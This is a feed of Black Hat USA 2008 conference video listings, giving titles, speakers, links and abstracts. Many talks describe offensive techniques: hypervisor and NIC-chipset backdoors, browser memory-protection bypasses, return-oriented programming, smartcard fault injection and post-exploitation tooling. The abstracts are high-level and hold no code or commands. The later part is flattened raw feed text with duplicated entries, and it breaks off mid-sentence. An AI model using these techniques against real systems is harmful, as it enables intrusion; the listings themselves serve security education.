Black Hat USA 2008 Hi-res .m4v Feed

This is the official feed for video presentations from Black Hat USA 2008, held at Caesars Palace, Las Vegas. The video format is suitable for desktop viewing, iTunes and widescreen portable video players.

Site: https://www.blackhat.com
Feed author: Darington Forbes (darington@blackhat.com); item contact: feedback@blackhat.com
Feed dates: Tue, 17 Mar 2009 12:53:41 -0700 and Mon, 16 Mar 2009 20:12:49 -0700


Black Hat USA 2008: Mike Zusman - Leveraging the Edge: Abusing SSL VPNs

Internet-facing SSL VPNs and Open Reverse Proxies can be abused to perform reconnaissance, data extraction, or general mischief INSIDE the Corporate Intranet and on SSL VPN clients. Such security devices are usually thought to add security to the enterprise network, while the increased client-side attack surface from required mobile code (ActiveX/Java) goes ignored.

This presentation will discuss programming and infrastructure flaws permitting abuse of the server, remote code execution on vulnerable clients, as well as appropriate countermeasures.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Zusman
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Zusman/black-hat-usa-08-zusman-abusingSSLVPNs-hires.m4v
Duration: 01:09:32
Keywords: Black Hat, Mike Zusman, SSL VPNs
Published: Mon, 16 Mar 2009 20:13:53 -0700


Black Hat USA 2008: Rafal Wojtczuk - Subverting the Xen Hypervisor

Bluepill and Vitriol are well-known projects that install a malicious hypervisor at run-time. Can one achieve the same stealth backdoor functionality when a legitimate hypervisor is already present, by modifying its code? Such an attempt would face at least the following difficulties:

a) the hypervisor may protect itself against modification at runtime

b) it may be nontrivial to integrate foreign code with the hypervisor

This presentation will demonstrate how to subvert the Xen hypervisor (on the 32-bit x86 platform) to gain backdoor functionality. The following topics will be covered:

a) brief overview of the Xen architecture

b) practical ways to stealthily use DMA to control all physical memory

c) Xen loadable backdoor modules framework - a description of a set of tools that allow compiled C code to be loaded easily into the Xen hypervisor (similarly to how Linux kernel modules work)

d) implementation of a backdoor residing in hypervisor space (and so invisible from the hosted operating system), allowing remote command execution

e) implementation of a backdoor residing in a hidden, unprivileged domain, allowing remote command execution in dom0

The code implementing the above will be demonstrated.

Attendees should know the basics of virtualization technologies and Linux kernel internals.

This presentation is the first in the series of three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred to as the “Xen 0wning trilogy”. The remaining talks are “Detecting and Preventing the Xen hypervisor subversions” and “Bluepilling the Xen hypervisor”.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Wojtczuk
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Wojtczuk/black-hat-usa-08-wojtzcuk-subvertingxen.m4v
Duration: 01:10:05
Keywords: Black Hat, Rafal Wojtczuk, Xen Hypervisor
Published: Mon, 16 Mar 2009 20:10:14 -0700
Black Hat USA 2008: Fyodor Vaskovich - Nmap: Scanning the Internet

The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project.

He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Fyodor
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Fyodor/black-hat-usa-08-fyodor-nmap.m4v
Duration: 00:41:16
Keywords: Black Hat, Fyodor Vaskovich, Nmap
Published: Mon, 16 Mar 2009 20:07:14 -0700


Black Hat USA 2008: Jeroen van Beek - ePassports Reloaded

In 2006, BlackHat Las Vegas presented a cloned ePassport. In 2008, the rumor goes that Elvis is still alive, or at least his passport is.

This presentation will examine the different mechanisms used in ePassports to prevent cloning and the creation of electronic travel documents with non-original content, and ways to attack these mechanisms.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#VanBeek
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-VanBeek/black-hat-usa-08-vanbeek-epassportsreloaded-hires.m4v
Duration: 00:44:51
Keywords: Black Hat, Jeroen van Beek, ePassports
Published: Mon, 16 Mar 2009 20:03:59 -0700


Black Hat USA 2008: Christopher Tarnovsky - Inducing Momentary Faults Within Secure Smartcards / Microcontrollers

This presentation is intended for individuals with an understanding of the Intel 8051 and Motorola 6805 processor families from an Assembly language perspective. This will be an interactive presentation with the audience.

Log files will be examined that have been taken from the targets (smartcards) at every clock cycle of the CPU during its runtime. We will discuss our possibilities and determine points in time (clock cycle periods) to momentarily induce a fault within the target.

Our goal will be to override the normal behavior of the target for our own use, such as:

* Temporary changes - readout of normally private records from the device
* Permanent changes - change non-volatile memory to create a back-door or completely rewrite the behavior model

Both smartcards contain a cryptographic co-processor and are known to have been used to secure data, PCs, laptops and Sun-Ray terminals.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Tarnovsky
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Tarnovsky/black-hat-usa-08-tarnovsky-momentaryfaults-hires.m4v
Duration: 01:12:23
Keywords: Black Hat, Christopher Tarnovsky, Smartcards / Microcontrollers
Published: Mon, 16 Mar 2009 20:00:18 -0700


Black Hat USA 2008: Bryan Sullivan - REST for the Wicked

Let's face it: SOAP sucks. Especially when it comes to Web 2.0 applications. Many high-profile web sites have come to this same conclusion: Amazon, MySpace, Yahoo, and others are abandoning SOAP in favor of REST. REST (Representational State Transfer), and particularly REST used in combination with JSON, is faster, more scalable, and easier to implement than SOAP. But do all these benefits come at the cost of security?

REST can be especially susceptible to attacks like Cross-Site Request Forgery and JavaScript Hijacking; worse, the usual remediation tactics that developers use to defend their apps against these attacks do not apply to REST services. In this presentation, I will demonstrate threats facing RESTful web services, myth-bust commonly proposed defense techniques, and provide appropriate development practices for defending REST.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Sullivan
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Sullivan/black-hat-usa-08-sullivan-REST-hires.m4v
Duration: 01:06:48
Keywords: Black Hat, Bryan Sullivan, REST
Published: Mon, 16 Mar 2009 19:57:17 -0700


Black Hat USA 2008: Matthieu Suiche - Windows Hibernation File for Fun and Profit

This presentation aims to describe the Windows hibernation file format and its modifications since Windows 2000. Hibernation provides an official way to dump physical memory into a specific file called hiberfil.sys. This file is completely undocumented; until now there has been no documentation about it.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Suiche
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Suiche/black-hat-usa-08-suiche-windowshibernation-hires.m4v
Duration: 00:55:38
Keywords: Black Hat, Matthieu Suiche, Windows Hibernation File
Published: Mon, 16 Mar 2009 19:54:40 -0700


Black Hat USA 2008: Tom Stracener - Xploiting Google Gadgets: Gmalware and Beyond

Google Gadgets are symptomatic of the Web 2.0 way of things: from lame gadgets that rotate through pictures of puppies to calendars and inline email on your iGoogle homepage.

This talk will analyze the security history of Google Gadgets and demonstrate ways to exploit Gadgets for nefarious purposes. We will also show ways to create Gadgets that allow you to port scan internal systems and do various JavaScript hacks via malicious (or useful) gadgets, depending on your point of view. We've already ported various JavaScript attack utilities to Google Gadgets (like PDP's JavaScript port scanner), among other things. We will also disclose a zero-day vulnerability in Google Gadgets that makes Gmalware (Gmodules-based malware) a significant threat.

This talk will be given by Robert Hansen (Rsnake) and Tom Stracener (Strace).

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Stracener
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Stracener/black-hat-usa-08-stracener-googlegadgets-hires.m4v
Duration: 00:52:21
Keywords: Black Hat, Tom Stracener, Google Gadgets, Gmalware, Malware
Published: Mon, 16 Mar 2009 19:51:02 -0700


Black Hat USA 2008: Joe Stewart - Protocols and Encryption of The Storm Botnet

This talk will provide an in-depth, detailed explanation of how the network and encryption protocols of the Storm botnet work together to create a massive and resilient peer-to-peer network capable of sending billions of spams per day.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Stewart
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Stewart/black-hat-usa-08-stewart-stormbotnet-hires.m4v
Duration: 01:11:25
Keywords: Black Hat, Joe Stewart, Protocols, Encryption, Storm Botnet
Published: Mon, 16 Mar 2009 19:44:23 -0700


Black Hat USA 2008: Scott Stender - Concurrency Attacks in Web Applications

Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.

Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can be shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.

Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult, targeted testing.

This presentation will provide deep technical background on this class of flaw, enumerate testing techniques that help identify when flaws are present, and demonstrate tools that automate the process.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Stender
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Stender/black-hat-usa-08-stender-concurrencyattacks-hires.m4v
Duration: 01:04:41
Keywords: Black Hat, Scott Stender, Concurrency Attacks, Web Applications
Published: Mon, 16 Mar 2009 19:41:22 -0700


Black Hat USA 2008: Jonathan Squire - A Fox in the Hen House (UPnP IGD)

Easy is the mantra of consumer devices these days. “Just plug it in and it works. No configuration needed.” All this simplicity hopefully causes one to pause and wonder: how is this possible?

This presentation will demonstrate the dangers of the often overlooked Universal Plug and Play (UPnP) Internet Gateway Device (IGD) profile. UPnP IGD is commonly enabled on modern home cable modem/wireless routers. UPnP IGD allows applications such as games and chat clients to request needed port forwards without the user’s intervention. Many of these routers do not even display these port mappings in their administrative interfaces.

In this presentation we will walk the audience through the simple steps needed to modify the port mappings on a common wireless router and discuss some of the potential attacks that can be performed. Sample code will be demonstrated that dynamically adds and removes port forwarding rules from the router to expose internal services to the internet. This simple attack is performed without any need for authentication, and the new forwarding rules generally aren’t visible in the web interface of the router.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Squire
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Squire/black-hat-usa-08-squire-UPnP-IGD-hires.m4v
Duration: 00:17:50
Keywords: Black Hat, Jonathan Squire, UPnP IGD
Published: Mon, 16 Mar 2009 19:38:23 -0700


Black Hat USA 2008: Sherri Sparks, Shawn Embleton - Deeper Door - Exploiting the NIC Chipset

In this presentation we will discuss a couple of significant problems in existing IDS / firewall technology and present a proof-of-concept "chipset"-level rootkit / network backdoor that is capable of bypassing virtually all host-based firewall and intrusion detection software on the market. These, of course, include popular, widely deployed software like Snort and Zone Alarm Security Suite. Our backdoor operates at an even deeper level than previous backdoors (e.g. Joanna's "DeepDoor" rootkit) because it interacts directly with the chipset interface of the NIC hardware. Capabilities include the ability to both covertly send AND receive packets. We use both of these capabilities to implement a simple command and control interface. Implications for security vendors include the exfiltration of sensitive information and delayed detection of malware threats like DDoS attacks, botnets, and worms.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Sparks
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Sparks/black-hat-usa-08-sparks-deeperdoor-hires.m4v
Duration: 00:56:12
Keywords: Black Hat, Sherri Sparks, Shawn Embleton, Deeper Door, NIC Chipset
Published: Mon, 16 Mar 2009 19:34:22 -0700


Black Hat USA 2008: Alexander Sotirov, Mark Dowd - How To Impress Girls With Browser Memory Protection Bypasses

Over the past several years, Microsoft has implemented a number of memory protection mechanisms with the goal of preventing the reliable exploitation of common software vulnerabilities on the Windows platform. Protection mechanisms such as GS, SafeSEH, DEP and ASLR complicate the exploitation of many memory corruption vulnerabilities and at first sight present an insurmountable obstacle for exploit developers.

This talk aims to present exploitation methodologies against this increasingly complex target. We will demonstrate how the inherent design limitations of the protection mechanisms in Windows Vista make them ineffective for preventing the exploitation of memory corruption vulnerabilities in browsers and other client applications.

Each of the aforementioned protections will be briefly introduced and its design limitations will be discussed. We will present a variety of techniques that can be used to bypass the protections and achieve reliable remote code execution in many different circumstances. Finally, we will discuss what Microsoft can do to increase the effectiveness of the memory protections at the expense of annoying Vista users even more.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Sotirov
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Sotirov/black-hat-usa-08-sotirov-impressgirls-hires.m4v
Duration: 01:04:57
Keywords: Black Hat, Alexander Sotirov, Mark Dowd, Browser Memory Protection Bypasses
Published: Mon, 16 Mar 2009 19:29:42 -0700


Black Hat USA 2008: Val Smith, Colin Ames - Meta-Post Exploitation

When penetration testing large environments, testers require the ability to maintain persistent access to systems they have exploited, leverage trusts to access other systems, and increase their foothold into the target. Post-exploitation activities are some of the most labor-intensive aspects of pen testing. These include password management, persistent host access, privilege escalation, trust relationships, acquiring GUI access, etc. Penetration testers acquire hashes, crack them, keep track of which passwords go with which usernames / systems and finally reuse this information to penetrate further systems.

This paper will first cover the technical details of these topics as well as some examples of manual methods currently in use during penetration tests. Next we will present some improvements to these techniques and demonstrate some tools we have developed which can be integrated with other popular applications such as Metasploit. We will also demonstrate automated methods for using collected password intelligence to penetrate massive numbers of systems. Finally we will suggest some future directions for this area.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Smith
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Valsmith/black-hat-usa-08-valsmith-metapost-hires.m4v
Duration: 00:57:35
Keywords: Black Hat, Val Smith, Colin Ames, Meta-Post Exploitation
Published: Mon, 16 Mar 2009 19:26:14 -0700


Black Hat USA 2008: Mark Shelhart - Meet The Owner Of a Real Hacked Company - Forensic Investigation

Jimmy owns a restaurant that was compromised by credit card hackers. Hear his story told by Jimmy, as well as by the forensic investigator that worked the case.

We will cover details of what the attacker specifically did, along with EnCase screenshots. We will also let Jimmy talk about what this meant to him, his family, and his business.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Shelhart
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Shelhart/black-hat-usa-08-shelhart-hackedcompany-hires.m4v
Duration: 00:33:50
Keywords: Black Hat, Mark Shelhart, Forensic Investigation
Published: Mon, 16 Mar 2009 19:22:54 -0700


Black Hat USA 2008: Hovav Shacham - Return-Oriented Programming: Exploits Without Code Injection

We describe return-oriented programming, a generalization of return-into-libc that allows an attacker to undertake arbitrary, Turing-complete computation without injecting code.

New computations are constructed by linking together code snippets that end with a "ret" instruction. The ret instructions allow an attacker who controls the stack to chain instruction sequences together. Because the executed code is stored in memory marked executable, W^X and DEP will not prevent it from running.

W^X and DEP, along with many other security systems, make the assumption that preventing the introduction of malicious code is sufficient to prevent the introduction of malicious computation. With the return-oriented computing approach, this assumption is false: subverting control flow on the stack is sufficient to construct arbitrary computation from "known-good" code.

On the x86 one can obtain useful instruction sequences by jumping into the middle of intended instructions, but return-oriented programming is possible even on RISC platforms that are very different from the x86.

Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Shacham
Video: https://media.blackhat.com/bh-usa-08/video/bh-us-08-Shacham/black-hat-usa-08-shacham-return-oriented-programming-hires.m4v
Duration: 01:04:22
Keywords: Black Hat, Hovav Shacham, Return-Oriented Programming, Exploits Without Code Injection
Published: Mon, 16 Mar 2009 19:16:41 -0700


Black Hat USA 2008: Alexander Tereshkin, Joanna Rutkowska - Bluepilling the Xen Hypervisor

We discuss how to insert Bluepill on top of the running Xen hypervisor (x64). We will show how to do that both with and without a restart (i.e. on the fly). To make this possible, our Bluepill needs to support full nested virtualization, so that Xen can still function properly. We will also discuss how the “Bluepill detection” methods proposed over the last 2 years, as well as the integrity scanning methods discussed in the previous speech, fit into this new scenario and how far we are from the stealth malware’s Holy Grail ;)

This presentation is the last in the series of three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred to as the “Xen 0wning trilogy”. It is recommended that the audience attend the “Subverting the Xen hypervisor” and “Detecting and Preventing the Xen hypervisor subversions” presentations before coming to this talk.
http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Tereshkin feedback@blackhat.com Computer F49C52EB-8B1D-46F7-97AD-7BF37A40A2E0-51585-0003210BFD3305B3-FFA Mon, 16 Mar 2009 19:13:46 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Rutkowska/black-hat-usa-08-rutkowska-bluepillingxen-hires.m4v Black Hat USA 2008: Alexander Tereshkin, Joanna Rutkowska - Bluepilling the Xen Hypervisor We discuss how to insert Bluepill on top of the running Xen hypervisor (x64). We will show how to do that both with and without restart (i.e. on the fly). To make this possible, our Bluepill needs to support full nested virtualization, so that Xen can still function properly. We will also discuss how the “Bluepill detection” methods proposed over the last 2 years, as well as the integrity scanning methods discussed in the previous speech, fit into this new scenario and how far we are from the stealth malware’s Holy Grail ;) This presentation is the last one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. It’s recommended for the audience to attend the “Subverting the Xen hypervisor” and “Detecting and Preventing the Xen hypervisor subversions” presentations before coming to this talks. 00:49:12 Black Hat,Alexander Tereshkin, Joanna Rutkowska,Bluepilling,Xen Hypervisor feedback@blackhat.com no Black Hat USA 2008: Joanna Rutkowska, Rafal Wojtczuk - Detecting & Preventing the Xen Hypervisor Subversions We discuss various anti-subverting techniques (IOMMU/VT-d, Xen’s driver- and stub- domains, etc) and whether they really can protect the Xen (or similar) hypervisor from compromises. 
After demonstrating that those mechanisms can be bypassed, we will switch to discussing hypervisor integrity scanning and will present some prototype solutions to this problem.<br /> <br /> This presentation is the second one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. It’s recommended for the audience to attend the “Subverting the Xen hypervisor” presentation before coming to this talk. The follow up presentation is entitled: “Bluepilling the Xen hypervisor”. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Rutkowska feedback@blackhat.com Computer 1BF17C24-D3F3-41D9-9DE9-75C9211F37F5-51585-000320DC4E656F51-FFA Mon, 16 Mar 2009 19:10:19 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Rutkowska/black-hat-usa-08-rutkowska-xensubversions-hires.m4v Black Hat USA 2008: Joanna Rutkowska, Rafal Wojtczuk - Detecting & Preventing the Xen Hypervisor Subversions We discuss various anti-subverting techniques (IOMMU/VT-d, Xen’s driver- and stub- domains, etc) and whether they really can protect the Xen (or similar) hypervisor from compromises. After demonstrating that those mechanisms can be bypassed, we will switch to discussing hypervisor integrity scanning and will present some prototype solutions to this problem. This presentation is the second one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. It’s recommended for the audience to attend the “Subverting the Xen hypervisor” presentation before coming to this talk. The follow up presentation is entitled: “Bluepilling the Xen hypervisor”. 
00:57:00 Black Hat, Joanna Rutkowska, Rafal Wojtczuk, Hypervisor, Xen, Subversions feedback@blackhat.com yes no Black Hat USA 2008: Paul Royal - Alternative Medicine: The Malware Analyst's Blue Pill Modern malware contains a myriad of anti-debugging, anti-instrumentation, and anti-VM techniques that pose challenges to security professionals who want to understand an instance’s malicious runtime behavior. Static analysis of malware can be similarly stymied by code obfuscations created using custom or best-of packers, and execution-based unpacking must deal with the same challenges as those focusing on runtime behavior. Robust tracing programs and automated deobfuscation tools help the analysis process, but given that nearly all of these approaches reside in or emulate part of the guest OS, the result is a fast-moving, ever-escalating detection/detection-prevention arms race.<br /> <br /> In an effort to evolve the nature of the obfuscation/deobfuscation game played between malware authors and security practitioners, this presentation will discuss the design and implementation of completely external malware analysis approaches that operate through the use of hardware virtualization extensions (e.g., Intel’s VT). To motivate their need, highlights of detection attacks for existing in-guest or emulation-based approaches will also be presented.<br /> <br /> In addition to showing how virtualization extensions can be carefully leveraged to create tracing and instrumentation techniques, construction of and source code for a (KVM-based) simple prototype allowing for fine-grained tracing and instrumentation will be provided. Test cases showing that the prototype prevents a malware instance from inferring that it is being spied upon or that the environment is not baremetal will also be presented. 
http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Royal feedback@blackhat.com Computer 1A26A3EB-A78B-41B2-A3D5-E6D035688B9B-51585-000320B55A94B1C2-FFA Mon, 16 Mar 2009 19:06:55 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Royal/black-hat-usa-08-royal-alternativemedicine-hires.m4v Black Hat USA 2008: Paul Royal - Alternative Medicine: The Malware Analyst's Blue Pill Modern malware contains a myriad of anti-debugging, anti-instrumentation, and anti-VM techniques that pose challenges to security professionals who want to understand an instance’s malicious runtime behavior. Static analysis of malware can be similarly stymied by code obfuscations created using custom or best-of packers, and execution-based unpacking must deal with the same challenges as those focusing on runtime behavior. Robust tracing programs and automated deobfuscation tools help the analysis process, but given that nearly all of these approaches reside in or emulate part of the guest OS, the result is a fast-moving, ever-escalating detection/detection-prevention arms race. In an effort to evolve the nature of the obfuscation/deobfuscation game played between malware authors and security practitioners, this presentation will discuss the design and implementation of completely external malware analysis approaches that operate through the use of hardware virtualization extensions (e.g., Intel’s VT). To motivate their need, highlights of detection attacks for existing in-guest or emulation-based approaches will also be presented. In addition to showing how virtualization extensions can be carefully leveraged to create tracing and instrumentation techniques, construction of and source code for a (KVM-based) simple prototype allowing for fine-grained tracing and instrumentation will be provided. Test cases showing that the prototype prevents a malware instance from inferring that it is being spied upon or that the environment is not baremetal will also be presented. 
00:44:34 Black Hat,Paul Royal,Alternative Medicine,Malware Analysis,Blue Pill feedback@blackhat.com no Black Hat USA 2008: Ivan Ristic, Ofer Shezaf - No More Signatures: Defending Web Applications from 0-Day Attacks with ModProfiler UsingTraffic Profiling Web application security is a big problem, yet there is never enough time to dedicate to solving the issue or, at least, making it smaller. To help with this, we embarked on a project that would enable you to tighten the security of your web applications with little effort. The project, called ModProfiler, aims to provide best-possible protection for web applications by analysing web application traffic passing by. This new open source tool builds on the success of ModSecurity (also open source), which is generally considered to be the most widely deployed web application firewall.<br /> <br /> The premise is simple: ModProfiler works by observing what's valid and what's not, resulting with a tight application shield designed around the positive security model concept. The process of shield construction is not as simple, but the complexity is hidden away. This talk, presented by Ivan Ristic and Ofer Shezaf, the authors of the tool, will give you an insight into the technology behind the scenes, and enable you to get the most out of it. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Ristic feedback@blackhat.com Computer 39492686-8DD9-4B0B-BF92-94C541CEF500-51585-000320862288FF26-FFA Mon, 16 Mar 2009 19:04:07 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Ristic/black-hat-usa-08-ristic-nomoresignatures-hires.m4v Black Hat USA 2008: Ivan Ristic, Ofer Shezaf - No More Signatures: Defending Web Applications from 0-Day Attacks with ModProfiler UsingTraffic Profiling Web application security is a big problem, yet there is never enough time to dedicate to solving the issue or, at least, making it smaller. 
To help with this, we embarked on a project that would enable you to tighten the security of your web applications with little effort. The project, called ModProfiler, aims to provide best-possible protection for web applications by analysing web application traffic passing by. This new open source tool builds on the success of ModSecurity (also open source), which is generally considered to be the most widely deployed web application firewall. The premise is simple: ModProfiler works by observing what's valid and what's not, resulting with a tight application shield designed around the positive security model concept. The process of shield construction is not as simple, but the complexity is hidden away. This talk, presented by Ivan Ristic and Ofer Shezaf, the authors of the tool, will give you an insight into the technology behind the scenes, and enable you to get the most out of it. 01:08:24 Black Hat, Ivan Ristic, Ofer Shezaf, Signatures, Web Application Security, 0-Day, ModProfiler, Traffic Profiling feedback@blackhat.com no Black Hat USA 2008: Mike Reavey, Steve Adegbite, Katie Moussouris - Secure the Planet! New Strategic Initiatives from Microsoft to Rock Your World Has Microsoft lost its mind??!! Yes and no! Three top security dudes (one technically being a dudette) at Microsoft have come up with three new programs that will change the face of the vulnerability industry. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Reavey feedback@blackhat.com Computer BB5EF00B-A7A8-4E1A-B2FA-18C31D9232D6-51585-00032050313B607C-FFA Mon, 16 Mar 2009 19:00:27 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Reavey/black-hat-usa-08-reavey-securetheplanet-hires.m4v Black Hat USA 2008: Mike Reavey, Steve Adegbite, Katie Moussouris - Secure the Planet! New Strategic Initiatives from Microsoft to Rock Your World Has Microsoft lost its mind??!! Yes and no! 
Three top security dudes (one technically being a dudette) at Microsoft have come up with three new programs that will change the face of the vulnerability industry. 01:11:30 Black Hat,Mike Reavey, Steve Adegbite, Katie Moussouris , Strategic Initiatives, Microsoft feedback@blackhat.com no Black Hat USA 2008: Danny Quist - Temporal Reverse Engineering Reverse engineering a program requires considerable patience and skill. The amount of information that has to be analyzed can be overwhelming, and often times the relevant portions of code represent a very small part of the overall program. One of the most effective methods for reverse engineering a program is to analyze the changes in memory state. This provides a fine grained view of execution, intent, and functionality. To analyze changes of state correctly you have to use a combination of static and dynamic methods. We will present our work on the use of process checkpointing as a means to track the changes in program state. Visualization changing process state can be used to reduce the amount of time necessary to analyze a program. As a demonstration we will analyze information protection systems, a known piece of malware, the Storm worm and a benign application. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Quist feedback@blackhat.com Computer D7CD0AA0-6F83-4078-98E7-17FCB82270B0-51585-00031FC6061C9B2F-FFA Mon, 16 Mar 2009 18:50:10 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Quist/black-hat-usa-08-quist-temporalreverse-hires.m4v Black Hat USA 2008: Danny Quist - Temporal Reverse Engineering Reverse engineering a program requires considerable patience and skill. The amount of information that has to be analyzed can be overwhelming, and often times the relevant portions of code represent a very small part of the overall program. One of the most effective methods for reverse engineering a program is to analyze the changes in memory state. 
This provides a fine grained view of execution, intent, and functionality. To analyze changes of state correctly you have to use a combination of static and dynamic methods. We will present our work on the use of process checkpointing as a means to track the changes in program state. Visualization changing process state can be used to reduce the amount of time necessary to analyze a program. As a demonstration we will analyze information protection systems, a known piece of malware, the Storm worm and a benign application. 00:43:33 Black Hat, Danny Quist, Temporal Reverse Engineering feedback@blackhat.com no Black Hat USA 2008: Bruce Potter - Malware Detection Through Network Flow Analysis Over the last several years, we've seen a decrease in effectiveness of "classical" security tools. The nature of the present day attacks is very different from what the security community has been used to in the past. Rather than wide-spread worms and viruses that cause general havoc, attackers are directly targeting their victims in order to achieve monetary or military gain. These attacks are blowing right past firewalls and anti-virus and placing malware deep in the enterprise. Ideally, we could fix this problem at its roots; fixing the software that is making us vulnerable. Unfortunately that's going to take a while, and in the interim security engineers and operators need new, advanced tools that allow deeper visibility into systems and networks while being easy and efficient to use.<br /> <br /> This talk will focus on using network flows to detect advanced malware. Network flows, made popular by Cisco's NetFlow implementation available on almost all their routers, has been used for years for network engineering purposes. And while there has been some capability for security analysis against these flows, there has been little interest until recently. This talk will describe NetFlow and how to implement it in your network. 
It will also examine advanced statistical analysis techniques that make finding malware and attackers easier. I will release a new version of Psyche, an open source flow analysis tool, and show specific examples of how to detect malware on live networks. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Potter feedback@blackhat.com Computer 3343A0F6-0A1B-40B6-9746-556CBA453FF2-51585-00031F8A753F4E9C-FFA Mon, 16 Mar 2009 18:46:59 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Potter/black-hat-usa-08-potter-networkflow-hires.m4v Black Hat USA 2008: Bruce Potter - Malware Detection Through Network Flow Analysis Over the last several years, we've seen a decrease in effectiveness of "classical" security tools. The nature of the present day attacks is very different from what the security community has been used to in the past. Rather than wide-spread worms and viruses that cause general havoc, attackers are directly targeting their victims in order to achieve monetary or military gain. These attacks are blowing right past firewalls and anti-virus and placing malware deep in the enterprise. Ideally, we could fix this problem at its roots; fixing the software that is making us vulnerable. Unfortunately that's going to take a while, and in the interim security engineers and operators need new, advanced tools that allow deeper visibility into systems and networks while being easy and efficient to use. This talk will focus on using network flows to detect advanced malware. Network flows, made popular by Cisco's NetFlow implementation available on almost all their routers, has been used for years for network engineering purposes. And while there has been some capability for security analysis against these flows, there has been little interest until recently. This talk will describe NetFlow and how to implement it in your network. It will also examine advanced statistical analysis techniques that make finding malware and attackers easier. 
I will release a new version of Psyche, an open source flow analysis tool, and show specific examples of how to detect malware on live networks. 01:11:57 Black Hat, Bruce Potter, Malware Detection,Network Flow Analysis feedback@blackhat.com no Black Hat USA 2008: Petko D. Petkov - Client-Side Security Client-side software generally refers to a class of computer programs that are executed on the client, by the user's supporting environment, instead of the server. Both, clients and servers are in constant interaction. In a Web environment, the client is represented by the user's web browser, while the server is the remote computer, which serves dynamic content. In a much broader context, the client-server relationship can be represented by a network client connected to a WiFi network.<br /> <br /> This paper describes numerous techniques for attacking Clients-side technologies. The content of the paper is based on the research that has been conducted over the past year by the GNUCITIZEN Ethical Hacker Outfit.<br /> <br /> If Apple responds before the event, I will drop the details of a QuickTime 0day for Windows Vista and XP. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Petkov feedback@blackhat.com Computer 095C91C4-64E0-4D1D-818C-30F6CDEB9E81-51585-00031F61F56A52C2-FFA Mon, 16 Mar 2009 18:42:39 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Petkov/black-hat-usa-08-petkov-clientsidesecurity-hires.m4v Black Hat USA 2008: Petko D. Petkov - Client-Side Security Client-side software generally refers to a class of computer programs that are executed on the client, by the user's supporting environment, instead of the server. Both, clients and servers are in constant interaction. In a Web environment, the client is represented by the user's web browser, while the server is the remote computer, which serves dynamic content. In a much broader context, the client-server relationship can be represented by a network client connected 